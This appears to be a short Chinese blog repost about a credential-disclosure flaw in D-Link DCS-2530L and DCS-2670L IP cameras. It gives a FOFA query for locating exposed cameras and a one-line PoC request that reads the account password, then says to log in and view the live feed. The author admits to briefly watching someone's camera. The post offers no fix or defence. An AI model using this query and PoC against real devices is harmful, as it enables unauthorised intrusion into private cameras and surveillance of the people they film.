D-Link DCS-2530L和DCS-2670L存在监控信息泄露漏洞,此漏洞利用如此简单,危害如此之大,不禁让人惊叹恐怖如斯。
fofa搜索: app="D_LINK_DCS_2530L"
随便进入一个,是登录界面,需要登录口令:
POC如下:
http://xx.xx.xx.xx/config/getuser?index=0
直接可以读取到监控页面的账户密码
接下来回到刚才的登陆界面正常输入口令即可进入
看了几秒就不敢看了,这玩意太可怕了。。
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。